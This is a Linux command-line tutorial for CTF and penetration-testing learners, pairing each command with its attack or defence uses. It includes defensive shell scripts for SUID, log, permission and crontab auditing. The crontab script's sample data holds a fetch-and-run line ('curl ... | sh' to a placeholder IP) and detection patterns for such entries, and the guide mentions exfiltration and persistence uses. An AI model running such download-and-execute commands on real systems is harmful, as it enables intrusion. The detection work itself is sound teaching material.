Master Linux, Master Cybersecurity
Welcome! The secret behind every elite hacker, pentester, and CTF champion isn't just a suite of fancy tools—it's a deep, fundamental mastery of the Linux command line. This guide transforms you from a beginner into a command-line pro, equipping you with the essential skills to conquer TryHackMe, dominate CTF challenges, and launch your cybersecurity career.
The Command Line Toolkit
The command line is where the real work happens. These are your essential tools for navigating systems, manipulating files, and uncovering secrets. Each command below is followed by a short description and the cybersecurity context in which you will use it.
Navigation & Files
**pwd**
Print Working Directory. Shows your current location in the filesystem.
Essential for orientation after gaining access to a new shell or directory.
**ls**
List directory contents. Use ls -la to see all files (including hidden ones) and their permissions; -R lists contents recursively.
Used to discover hidden files (.bash_history, .ssh), configurations, scripts, and potential flags.
**cd**
Change Directory. Used to navigate through the filesystem. Shortcuts: cd ~ (home), cd .. (up one level), cd - (previous directory).
The primary way to move around a compromised system to explore directories such as logs or web roots.
**cat**
Concatenate and print files. Displays the content of a file. Can also create new files or combine multiple files.
Quickly read the content of flags, configuration files (/etc/passwd), or source code. For larger files, use less or more.
**less**
View file content page by page. Allows scrolling and searching within large files. Press q to quit.
Efficiently review large log files (/var/log/auth.log) or extensive codebases without overwhelming the terminal.
**more**
Similar to less, but with more basic navigation. Displays file content one screen at a time. Press q to quit.
A simpler alternative to less for paginating through text files.
**head**
Output the first part of files (default: first 10 lines). Use -n to specify the number of lines.
Quickly preview the beginning of log files or configuration files to get an overview.
**tail**
Output the last part of files (default: last 10 lines). Use -f to follow file changes (useful for live logs).
Monitor real-time log updates (tail -f /var/log/apache2/access.log) during web exploitation or system monitoring.
**touch**
Create a new, empty file in a specified directory. If the file exists, it updates its timestamp.
Creating placeholder files, files for redirection in exploits, or temporary data storage.
**cp**
Copy files and directories. Use cp -R for directories.
Copying tools to a target, duplicating sensitive files for exfiltration, or making backups before modification.
**mv**
Move or rename files and directories.
Relocating sensitive files, renaming malicious payloads to evade detection, or organizing forensic artifacts.
**mkdir**
Make directory. Creates one or more directories. Use -p to create nested directory structures.
Organizing your CTF notes, creating temporary directories for exploits, or structuring your penetration testing workspace.
**rm**
Remove files or directories. **WARNING:** rm -rf (recursive, force) deletes directories and their contents without confirmation and is very dangerous.
Cleaning up temporary files, removing forensic artifacts, or deleting malicious files after analysis. Use with extreme caution.
**rmdir**
Remove an empty directory. Only works if the directory contains no files or subdirectories.
Cleaning up empty directories after file operations or system cleanup tasks.
**file**
Determine file type. Identifies the nature of a file (e.g., text, binary, script, image).
Crucial for identifying unknown files encountered in CTFs so you know how to proceed with analysis (e.g., file exploit.bin to confirm it is an executable).
**history**
Display previously executed commands.
Reviewing your own actions during a CTF, or examining a compromised system's history for clues about previous activity or commands executed by other users.
**find**
Search a directory hierarchy for files matching criteria such as name, type, owner, size, modification time, or permissions (e.g., find / -perm -4000 -type f).
Locating sensitive files, specific binaries (e.g., SUID binaries), or files with certain permissions across the entire system.
**locate**
Faster file search that relies on a pre-built database. Requires sudo updatedb to refresh the database.
Quickly finding known files across the system, especially useful when the database is up to date.
**which**
Outputs the full path of a binary or executable, showing where a command is located on the system.
Verifying the path of an executable, especially in PATH manipulation attacks or when confirming tool availability.
**tar**
Archiving utility used to bundle multiple files or directories into a single archive (often .tar, or .tar.gz with compression).
Bundling files for exfiltration, extracting archived data from a target system, or packaging tools for transfer.
**zip**
Compress and package files into a .zip archive.
Reducing file sizes for exfiltration or creating compressed archives of sensitive data.
**unzip**
Extract files from a .zip archive.
Decompressing downloaded tools, exploits, or data archives on a target system.
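The find entry above mentions locating SUID binaries; the defensive version of that task is to keep an inventory and diff against it, so that a set-uid file which was not there last time stands out. The script below is an added example (not code from the original page) that chains find, chmod, sort and diff for exactly that. It only ever operates on a temporary directory it creates itself; the file names in the demo are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): a small SUID audit built from
# find, chmod, sort and diff. Record a baseline of set-uid files, then diff
# later scans against it so a newly added set-uid file stands out.
# All paths below are constructed inside a temporary directory.

# Regular files under $1 with the set-uid bit (octal 4000), sorted for diffing.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Write the current SUID inventory of directory $1 to baseline file $2.
save_baseline() {
    list_suid "$1" > "$2"
}

# Print SUID files present now under $1 but missing from baseline $2.
# diff marks lines only in the second input with "> "; sed keeps just those.
new_suid_since_baseline() {
    list_suid "$1" | diff "$2" - | sed -n 's/^> //p'
}

# Demonstration on a constructed tree; nothing here touches the real system.
demo_suid_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/tmp"
    printf '#!/bin/sh\necho ok\n' > "$tmp/bin/helper"
    chmod 4755 "$tmp/bin/helper"              # an expected set-uid helper
    save_baseline "$tmp" "$tmp/suid.baseline"
    echo "baseline:"; cat "$tmp/suid.baseline"
    # Later scan: a set-uid file has appeared in a world-writable location.
    printf '#!/bin/sh\n' > "$tmp/tmp/.cache"
    chmod 4755 "$tmp/tmp/.cache"
    echo "new since baseline:"
    new_suid_since_baseline "$tmp" "$tmp/suid.baseline"
    rm -rf "$tmp"
}

# Run the demo only when invoked as: sh suid_audit.sh demo
if [ "${1:-}" = "demo" ]; then
    demo_suid_audit
fi
```

On a real host you would run save_baseline against / once after a clean install and schedule new_suid_since_baseline; any line it prints is worth a look, since legitimate software rarely adds set-uid binaries after installation.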
Permissions & Ownership
**chmod**
Change file mode bits (permissions). Can use symbolic mode (e.g., u+x) or octal mode (e.g., 755).
Used to make scripts executable, set proper permissions on sensitive files, or exploit misconfigured permissions for privilege escalation.
**chown**
Change file owner and group. Syntax: chown user:group filename.
Managing access control by assigning specific users or groups ownership of files. Useful in post-exploitation to change file ownership.
Process Management
**ps**
Report a snapshot of the current processes. ps aux shows all processes (user, CPU, memory, command).
Used to identify running services, daemons, or suspicious processes that might be part of the challenge or malware activity.
**top**
Display Linux processes dynamically, showing real-time system resource usage (CPU, memory) and active processes. Press q to quit.
Quickly identify resource-intensive processes, potential malware, or unexpected activity on a system.
**htop**
An interactive process viewer, similar to top but with a more user-friendly interface and additional features like vertical and horizontal scrolling.
Enhanced real-time monitoring of processes, allowing for easier identification and management of suspicious or resource-hogging applications.
**kill**
Send a signal to a process by PID (default SIGTERM, which asks it to exit; kill -9 sends SIGKILL, which cannot be caught).
Terminating unresponsive or malicious processes identified during system analysis or post-exploitation.
**killall**
Terminate all instances of a specific program, useful for quickly shutting down multiple malicious processes.
**lsof**
List open files. Shows processes that have specific files or network connections open.
Identify which processes are interacting with sensitive files, network ports, or devices; crucial for forensic analysis and understanding system activity.
**pstree**
Display running processes in a tree-like format, showing parent-child relationships.
Visualize process hierarchies to understand how processes were spawned, which can help in identifying rootkits or complex malware chains.
Package Management
**pacman -S**
Install new packages. Example: sudo pacman -S nmap.
Installing necessary tools and utilities on Arch/Garuda Linux systems, including penetration testing tools.
**pacman -R**
Remove packages. Example: sudo pacman -R nmap.
Removing unwanted or malicious software from a system.
**pacman -Syu**
Synchronize and update all packages on the system. This is a crucial command for system maintenance.
Keeping your system and tools up to date with the latest security patches and features, reducing vulnerabilities.
**pacman -Ss**
Search for packages in the repositories. Example: pacman -Ss wireshark.
Discovering available tools and software that might be useful for a CTF or penetration test.
Text Processing
**grep**
Globally search for a regular expression and print matching lines. Powerful options include -r (recursive) and -i (ignore case).
Searching source code, configuration files, and logs for keywords such as password or flag, or for a known IP address, across a whole directory tree.
**awk**
A powerful pattern scanning and processing language. Excellent for extracting and manipulating data from structured text files.
Parsing log files, extracting specific fields from command output, or transforming data for analysis during forensics or data exfiltration.
**sed**
Stream editor for filtering and transforming text. Used for finding and replacing text in files or streams.
Modifying configuration files, sanitizing data, or injecting malicious commands into scripts during post-exploitation.
**cut**
Remove sections from each line of files. Useful for extracting specific columns from delimited data.
Extracting usernames from /etc/passwd or specific fields from log entries for further analysis.
**sort**
Sort lines of text files. Can sort alphabetically, numerically, or by specific fields.
Organizing large lists of data (e.g., wordlists, IP addresses) for easier analysis or processing.
**uniq**
Report or omit repeated lines. Often used with sort to get unique entries from a list.
Filtering duplicate entries from wordlists or lists of discovered files/IPs to reduce noise during enumeration.
**wc**
Print newline, word, and byte counts for files. Useful for quickly assessing file size or content volume.
Quickly check the number of lines in a log file or a wordlist, or count specific occurrences with grep | wc -l.
**diff**
Compare files line by line. Shows the differences between two files.
Identifying changes made to system configuration files by an attacker, or comparing exploit code versions.
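The text-processing commands above are rarely used one at a time; the value is in the pipelines. The script below is an added example (not from the original page) that runs grep, awk, cut, sort, uniq and wc over two constructed inputs: a handful of sshd lines in /var/log/auth.log format and an /etc/passwd excerpt. The log lines, IP addresses and account names are invented for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): the text-processing toolkit
# (grep, awk, cut, sort, uniq, wc) applied to constructed sample data.

# Constructed sshd lines in /var/log/auth.log format (not real log data).
SAMPLE_AUTH_LOG='Jan 10 10:01:02 host sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jan 10 10:01:05 host sshd[1235]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jan 10 10:02:00 host sshd[1236]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2
Jan 10 10:03:11 host sshd[1237]: Failed password for root from 198.51.100.7 port 52000 ssh2
Jan 10 10:03:15 host sshd[1238]: Failed password for invalid user test from 203.0.113.5 port 51250 ssh2'

# Constructed /etc/passwd excerpt (not a real system's file).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:1001:1001::/opt/svc:/bin/sh'

# Failed SSH logins per source IP, busiest first. Output: "count ip" per line.
# awk walks the fields and prints the one after "from" so the position of the
# IP does not matter (it shifts when "invalid user" is present).
failed_logins_by_ip() {
    printf '%s\n' "$SAMPLE_AUTH_LOG" \
      | grep 'Failed password' \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $1, $2 }'
}

# Total number of failed attempts (the grep | wc -l idiom, via grep -c).
failed_login_count() {
    printf '%s\n' "$SAMPLE_AUTH_LOG" | grep -c 'Failed password'
}

# Accounts with an interactive login shell: field 1 (user) and 7 (shell).
interactive_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" \
      | cut -d: -f1,7 \
      | grep -v -e '/nologin$' -e '/false$' \
      | cut -d: -f1
}

# UID 0 accounts other than root: a classic backdoor indicator to review.
extra_uid0_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

if [ "${1:-}" = "demo" ]; then
    echo "failed logins: $(failed_login_count)"
    failed_logins_by_ip
    echo "interactive accounts: $(interactive_accounts | tr '\n' ' ')"
    echo "extra uid 0 accounts: $(extra_uid0_accounts)"
fi
```

To run the same pipelines against a real host, replace the printf of the sample with `cat /var/log/auth.log` or `cat /etc/passwd`; nothing else changes.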
System & Disk
**df**
Report file system disk space usage. Shows total, used, and available space on mounted filesystems.
Check disk space on a target system to see if large files (e.g., logs, exfiltrated data) are present or if the disk is full.
**du**
Estimate file space usage. Shows disk usage of files and directories.
Identify large directories or files that might contain sensitive data or be indicative of malicious activity.
**mount**
Attach a filesystem to a specific mount point in the file system tree.
Understanding how external devices or network shares are mounted, which can reveal additional attack surfaces or data sources.
**umount**
Detach mounted filesystems.
Unmounting compromised or irrelevant filesystems during forensic cleanup or system hardening.
**uname**
Print system information. Use -a for all information (kernel name, hostname, kernel version, architecture).
Gathering basic system information (OS, kernel version) for vulnerability research and exploit development.
**hostname**
Show or set the system's hostname.
Identify the target machine by its network name during reconnaissance.
**dmesg**
Print or control the kernel ring buffer. Displays messages from the kernel.
Reviewing kernel messages for hardware errors, security events, or signs of rootkit activity.
**fdisk**
Manipulate disk partition tables. Requires root privileges.
Understanding disk layout on a compromised system or preparing disks for forensic imaging.
**mkfs**
Build a Linux filesystem. Used to format partitions.
Creating new filesystems on disks or partitions, relevant in forensic scenarios or when setting up new storage.
**crontab**
Manage user-specific cron tables for scheduling tasks.
Identifying scheduled tasks that might be malicious, persistent backdoors, or legitimate tasks that can be abused.
Users & Groups
**useradd**
Create a new user account.
Creating new user accounts for persistence or to facilitate access on a compromised system.
**userdel**
Delete a user account and optionally its home directory.
Removing unauthorized user accounts or cleaning up after an attack.
**groupadd**
Create a new group.
Creating new groups for privilege management or to organize users on a system.
**groupdel**
Delete a group.
Removing unnecessary or malicious groups from a system.
**id**
Print real and effective user and group IDs. Shows the current user's identity and group memberships.
Quickly check current user privileges and group memberships, which is vital for privilege escalation paths.
Services
**systemctl**
Control the systemd system and service manager. Used to start, stop, enable, disable, and check the status of services.
Managing critical services like web servers, SSH, or databases. Attackers might disable security services or enable malicious ones; defenders use it to secure services.
Environment
**env**
Print all or part of the environment. Shows environment variables and their values.
Discovering sensitive information stored in environment variables (e.g., API keys, passwords) or understanding how programs are configured.
**export**
Set an environment variable for child processes.
Setting up custom PATH variables for privilege escalation, or defining variables for scripts and exploits.
Text Editors
**nano**
A simple, user-friendly text editor for the command line.
Quickly editing configuration files, scripts, or notes on a remote system when vim is too complex or unavailable.
**vim**
A highly configurable and powerful text editor. Has a steep learning curve but is extremely efficient once mastered.
Extensive editing of code, configuration files, or large text documents. Often available on compromised systems.
Advanced Net
**ssh-keygen**
Generate, manage, and convert authentication keys for SSH. Used to create public/private key pairs.
Generating SSH keys for secure remote access, or analyzing existing keys on a compromised system for unauthorized access.
**scp**
Secure Copy. Used to securely copy files between hosts on a network over SSH.
Securely transferring tools, exploits, or exfiltrated data to/from a remote server.
**sftp**
SSH File Transfer Protocol. An interactive file transfer program, similar to FTP but over SSH.
Interactively browsing and transferring files to/from a remote server over a secure channel.
**rsync**
A fast, versatile, remote (and local) file-copying tool. Efficiently synchronizes files and directories.
Mirroring directories for data exfiltration, or maintaining backups of sensitive data.
**ufw**
Uncomplicated Firewall. A user-friendly front-end for iptables to manage firewall rules.
Quickly configuring firewall rules on systems that use ufw to block or allow network traffic, essential for defense or for establishing covert channels.
**journalctl**
Query the systemd journal. Used to view and filter system logs.
Analyzing system logs for security events, failed login attempts, or signs of compromise, offering a more modern way to view logs than the traditional /var/log files.
Network Security
**ip**
Modern utility to manage network interfaces, IP addresses, and routing tables. Replaces ifconfig. Example: ip addr show.
Finding your own IP address, identifying network interfaces, and understanding network configurations on a target or your own machine.
**ping**
Test network connectivity to a host by sending ICMP Echo Request packets.
Basic host discovery, checking if a target machine is reachable, or verifying network connectivity to a C2 server.
**netstat / ss**
Display network connections, routing tables, and interface statistics. ss is the faster, more informative modern replacement. Example: ss -tulnp (TCP, UDP, listening, numeric, process info).
Identifies open ports, active connections, and listening services on a target or your own machine, revealing potential attack vectors or malware activity.
**traceroute**
Maps the path that packets take to reach a destination, showing hops and response times.
Mapping network paths, identifying network segmentation, firewalls, or intermediate devices between you and a target.
**nslookup / dig**
Query Domain Name System (DNS) records. dig is generally preferred for more detailed DNS information. Example: dig example.com.
DNS enumeration for subdomains, mail servers, or other related infrastructure during reconnaissance.
**whois**
Look up public domain registration information, including owner details, registration dates, and contact info.
Gathering intelligence on domain owners, their contact information, and domain registration history during OSINT (Open Source Intelligence).
**curl / wget**
Transfer data from or to a server. curl is versatile for interacting with web servers (e.g., curl -I https://example.com for HTTP headers), while wget is primarily for downloading files (e.g., wget https://example.com/exploit.sh).
Essential for testing web vulnerabilities (like LFI/RCE), downloading tools/exploits to a target, or exfiltrating data from web servers.
**tcpdump**
Packet analyzer that captures network traffic from specified interfaces (e.g., sudo tcpdump -i eth0).
Analyzing network traffic for sensitive data, credentials, hidden communications, or identifying malicious network patterns during forensics or active attacks.
**nmap**
Network Mapper. The industry-standard tool for network discovery and security auditing. Example: nmap -sV example.com (service version detection).
The go-to tool for discovering live hosts, open ports, and services on a network. Fundamental for initial reconnaissance and vulnerability assessment.
**sudo**
Execute a command as another user (typically the superuser). sudo -l lists the commands the current user is allowed to run.
A primary vector for privilege escalation. Misconfigurations allowing unprivileged users to run powerful commands as root are common in CTFs and real-world scenarios.
**iptables**
Linux firewall utility used to manage network traffic rules (allow/block based on IP, port, protocol).
Understanding firewall rules on a target system, or configuring your own firewall for defense and network segmentation.
The System Map: File Hierarchy
A Linux system isn't a random collection of folders; it's a logical map. Knowing this map is crucial for finding config files, logs, and potential vulnerabilities.
- / : Root directory. The absolute top-most directory. All other directories and files reside beneath it.
- /bin : Essential user command binaries (e.g., ls, cp). Accessible to all users.
- /sbin : System administration binaries (e.g., fdisk, reboot). Typically require root privileges.
- /etc : System-wide configuration files and scripts (e.g., passwd, sshd_config). A CTF goldmine!
- /home : User home directories. Each standard user has a personal directory here (e.g., /home/user).
- /root : Dedicated home directory for the root user.
- /tmp : Temporary files used by programs. Often world-writable; data is typically deleted on reboot.
- /var : Variable data files, including system logs (/var/log), databases, and web content. Crucial for forensic analysis.
- /usr : User programs and data, including installed software, libraries, and documentation.
- /dev : Device files, representing hardware devices as files (e.g., /dev/sda).
- /proc : Virtual file system providing real-time information about running processes. Excellent for reconnaissance.
- /sys : Virtual file system providing information about kernel-related device details.
Permissions Unlocked: The Locks & Keys
File permissions control who can read, write, and execute files and directories. Misconfigurations are a primary path to privilege escalation in CTFs and real-world attacks, so the chmod command and its octal notation are worth mastering.
Understanding Read, Write, Execute (rwx)
- For files:
  - r (read): Allows viewing the file's content.
  - w (write): Permits modification or deletion of the file's content.
  - x (execute): Enables running the file as a program or script.
- For directories:
  - r (read): Allows listing the contents of the directory.
  - w (write): Permits adding, removing, or renaming files within the directory.
  - x (execute): Grants the ability to enter the directory and access its contents.
Permissions are assigned to three categories: the file's Owner, the file's Group, and Others (everyone else on the system).
Special Permissions: SUID, SGID, and Sticky Bit
- SetUID (SUID): When set on an executable file, it allows the file to be run with the permissions of its owner, regardless of who executes it. This is a common target for privilege escalation (e.g., the passwd command runs as root to modify /etc/passwd).
- SetGID (SGID): For executable files, it runs with the group permissions of the file. For directories, new files created within that directory inherit the directory's group, rather than the primary group of the user who created them.
- Sticky Bit: Applied only to directories, it ensures that only the owner of a file (or the directory owner, or root) can delete or rename files within that directory. This is commonly seen on public directories like /tmp to prevent users from deleting each other's temporary files.
WARNING: Using chmod 777 (read, write, execute for everyone) is a significant security risk and should almost never be used on sensitive files!
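The rwx table and the special bits above are exactly what the octal chmod argument encodes. The script below is an added example (not from the original page) that does the conversion by hand: it turns an octal mode such as 4755 into the nine-character string that ls -l shows (rwsr-xr-x, with the s/S and t/T convention for the special bits), flags modes that are set-uid or world-writable, and cross-checks its answer against the kernel by applying the mode with chmod to a temporary file. Function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the page): the chmod arithmetic done by hand.
# octal_to_symbolic turns an octal mode such as 4755 into the rwx string that
# ls -l prints (rwsr-xr-x), including the SUID/SGID/sticky bits, and
# mode_warning flags the two things a reviewer looks for first.

# One octal digit (0-7) -> its rwx triplet.
triplet() {
    case "$1" in
        0) echo '---' ;; 1) echo '--x' ;; 2) echo '-w-' ;; 3) echo '-wx' ;;
        4) echo 'r--' ;; 5) echo 'r-x' ;; 6) echo 'rw-' ;; 7) echo 'rwx' ;;
        *) echo "bad octal digit: $1" >&2; return 1 ;;
    esac
}

# class_str <digit> <special bit set: 0|1> <s|t>
# With the special bit set, the execute slot shows s/t when execute is also
# set and S/T (capital) when it is not, exactly as ls -l does.
class_str() {
    t=$(triplet "$1") || return 1
    if [ "$2" -eq 0 ]; then
        echo "$t"
    else
        case "$t" in
            *x) echo "${t%?}$3" ;;
            *)  echo "${t%?}$(echo "$3" | tr 'st' 'ST')" ;;
        esac
    fi
}

# octal_to_symbolic 755 -> rwxr-xr-x ; octal_to_symbolic 4755 -> rwsr-xr-x
# A fourth leading digit holds the special bits: 4 = SUID, 2 = SGID, 1 = sticky.
octal_to_symbolic() {
    mode=$1
    special=0
    case "$mode" in
        [0-7][0-7][0-7]) ;;
        [0-7][0-7][0-7][0-7]) special=${mode%???}; mode=${mode#?} ;;
        *) echo "usage: octal_to_symbolic <3 or 4 octal digits>" >&2; return 1 ;;
    esac
    mid=${mode#?}
    u=$(class_str "${mode%??}" $(( (special & 4) != 0 )) s) || return 1
    g=$(class_str "${mid%?}"   $(( (special & 2) != 0 )) s) || return 1
    o=$(class_str "${mode#??}" $(( (special & 1) != 0 )) t) || return 1
    echo "$u$g$o"
}

# mode_warning 4777 -> "setuid, world-writable" ; mode_warning 755 -> "none"
mode_warning() {
    sym=$(octal_to_symbolic "$1") || return 1
    flags=''
    case "$sym" in ??[sS]??????) flags='setuid' ;; esac
    case "$sym" in ???????w?) flags="${flags:+$flags, }world-writable" ;; esac
    echo "${flags:-none}"
}

# Cross-check against the kernel: apply the mode with chmod to a temporary
# file and compare with what ls -l reports (columns 2-10).
verify_with_chmod() {
    f=$(mktemp) || return 1
    chmod "$1" "$f"
    actual=$(ls -l "$f" | cut -c2-10)
    rm -f "$f"
    expected=$(octal_to_symbolic "$1")
    echo "chmod $1 -> ls shows $actual, calculator says $expected"
    [ "$actual" = "$expected" ]
}

if [ "${1:-}" = "demo" ]; then
    for m in 644 755 4755 2755 1777 777; do
        echo "$m -> $(octal_to_symbolic "$m")  [$(mode_warning "$m")]"
    done
    verify_with_chmod 4755
fi
```

The capital S/T case is the one people trip over: chmod 4644 sets the SUID bit on a file nobody can execute, and ls -l shows rwSr--r-- to signal that the bit is present but meaningless.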
Cybersecurity Tool Usage
A quick look at which tools are frequently used in CTF reconnaissance phases.
Process Management: What's Running?
Understanding processes is key to monitoring system health, identifying suspicious activity, and terminating unwanted programs; the ps, top, kill and lsof entries above are the tools for each of those tasks.
Package Management: Installing & Removing Software
For Garuda Linux users, pacman is your package manager. Learn how to install, remove, and update software, a fundamental skill for setting up your hacking lab or managing tools on a target.
Scheduled Tasks: Understanding Crontab
cron is used to schedule commands to run periodically. Understanding crontab entries is vital for identifying persistent backdoors or scheduled malicious activities on a compromised system.
Crontab Entry Visualizer
Crontab entry: 0 0 1 1 0
The five schedule fields are minute, hour, day of month, month, and day of week. This entry runs at 00:00 on the 1st of January and at 00:00 every Sunday: when both the day-of-month and day-of-week fields are restricted, cron runs the command whenever either one matches.
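Reading crontab lines by eye is error-prone, and the entries that matter during an incident are usually the ones that look innocuous. The script below is an added example (not from the original page) that splits a crontab line into its five schedule fields and command, puts the schedule into words (including the "either field matches" rule for the entry above), and flags entries a reviewer would examine first: commands that live under /tmp or /dev/shm, or that pipe a download straight into a shell. The crontab content, the host name and the IP address in it are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the page): describe crontab schedules in words and
# flag entries worth a closer look. SAMPLE_CRONTAB is constructed test data.

SAMPLE_CRONTAB='# m h dom mon dow command
0 0 1 1 0 /usr/local/bin/yearly-report.sh
*/5 * * * * /usr/bin/backup-check
@reboot /tmp/.cache/update.sh
30 2 * * * curl -s http://203.0.113.9/x.sh | sh'

dow_name() {
    case "$1" in
        0|7) echo Sunday ;; 1) echo Monday ;; 2) echo Tuesday ;; 3) echo Wednesday ;;
        4) echo Thursday ;; 5) echo Friday ;; 6) echo Saturday ;; *) echo "weekday $1" ;;
    esac
}

# cron_describe "0 0 1 1 0" -> plain-language schedule. Handles numbers, '*'
# and '*/n' minutes, which covers most real entries; anything fancier is
# passed through as-is in the text.
cron_describe() {
    case "$1" in @*) echo "special schedule ${1%% *}"; return 0 ;; esac
    set -f                      # no globbing: '*' fields must stay literal
    set -- $1
    set +f
    [ $# -ge 5 ] || { echo "need 5 schedule fields" >&2; return 1; }
    min=$1 hour=$2 dom=$3 mon=$4 dow=$5
    case "$min" in
        '*/'*) when="every ${min#\*/} minutes" ;;
        *) case "$hour" in
               '*') when="at minute $min of every hour" ;;
               *)   when=$(printf 'at %02d:%02d' "$hour" "$min") ;;
           esac ;;
    esac
    monthtxt=''
    [ "$mon" = '*' ] || monthtxt=" of month $mon"
    if [ "$dom" = '*' ] && [ "$dow" = '*' ]; then
        days="every day$monthtxt"
    elif [ "$dow" = '*' ]; then
        days="on day $dom$monthtxt"
    elif [ "$dom" = '*' ]; then
        days="on $(dow_name "$dow")$monthtxt"
    else
        # Both day fields restricted: cron fires when EITHER matches.
        days="on day $dom$monthtxt or on $(dow_name "$dow") (both day fields set: cron runs on either match)"
    fi
    echo "$when $days"
}

# suspicious_cron_entries "<crontab text>" -> the command part of each entry
# that runs from /tmp or /dev/shm, or pipes something into sh/bash.
suspicious_cron_entries() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*(#|$)/ { next }                       # skip comments and blanks
        {
            start = ($1 ~ /^@/) ? 2 : 6               # @reboot etc. have one field
            cmd = ""
            for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
            if (cmd ~ /(^|[ \t])\/(tmp|dev\/shm)\// || cmd ~ /\|[ \t]*(sh|bash)([ \t]|$)/)
                print cmd
        }'
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_CRONTAB" | grep -v '^#' | while IFS= read -r line; do
        echo "$line"
        echo "  -> $(cron_describe "$line")"
    done
    echo "review first:"
    suspicious_cron_entries "$SAMPLE_CRONTAB" | sed 's/^/  /'
fi
```

To audit a live system, feed `crontab -l` for each user (and the contents of /etc/crontab and /etc/cron.d) to suspicious_cron_entries instead of the sample; the heuristics are deliberately simple, so treat a hit as a prompt to read the entry, not as proof of compromise.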
Service Management: Controlling Daemons
systemctl is the primary command for managing system services (daemons). Knowing how to start, stop, enable, and disable services is crucial for both defensive and offensive operations.